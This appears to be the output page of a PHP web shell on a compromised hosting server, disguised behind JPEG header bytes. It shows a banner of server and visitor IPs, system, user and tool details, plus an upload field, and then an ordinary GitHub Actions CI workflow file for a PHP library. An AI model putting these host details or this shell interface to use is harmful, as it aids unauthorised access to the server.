����JFIF��x�x����'
Server IP : 78.140.185.180 / Your IP : 18.218.161.96 Web Server : LiteSpeed System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : builderbox ( 1072) PHP Version : 7.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/builderbox/public_html/vendor/doctrine/deprecations/.github/workflows/ |
Upload File : |
name: "Continuous Integration" on: pull_request: jobs: coding-standards: name: "Coding Standards" runs-on: "ubuntu-latest" strategy: matrix: php-version: - "7.4" steps: - name: "Checkout" uses: "actions/checkout@v2" - name: "Install PHP" uses: "shivammathur/setup-php@v2" with: coverage: "none" php-version: "${{ matrix.php-version }}" tools: "cs2pr" - name: "Cache dependencies installed with composer" uses: "actions/cache@v1" with: path: "~/.composer/cache" key: "php-${{ matrix.php-version }}-composer-locked-${{ hashFiles('composer.lock') }}" restore-keys: "php-${{ matrix.php-version }}-composer-locked-" - name: "Install dependencies with composer" run: "composer install --no-interaction --no-progress --no-suggest" - name: "Run squizlabs/php_codesniffer" run: "vendor/bin/phpcs -q --no-colors --report=checkstyle | cs2pr" phpunit: name: PHPUnit runs-on: ubuntu-latest strategy: matrix: php-version: ['7.1', '7.2', '7.3', '7.4'] steps: - name: "Checkout" uses: "actions/checkout@v2" - name: Setup PHP uses: shivammathur/setup-php@v1 with: php-version: ${{ matrix.php-version }} - name: "Install dependencies with composer" run: "composer install --no-interaction --no-progress --no-suggest" - name: PHPUnit run: "vendor/bin/phpunit"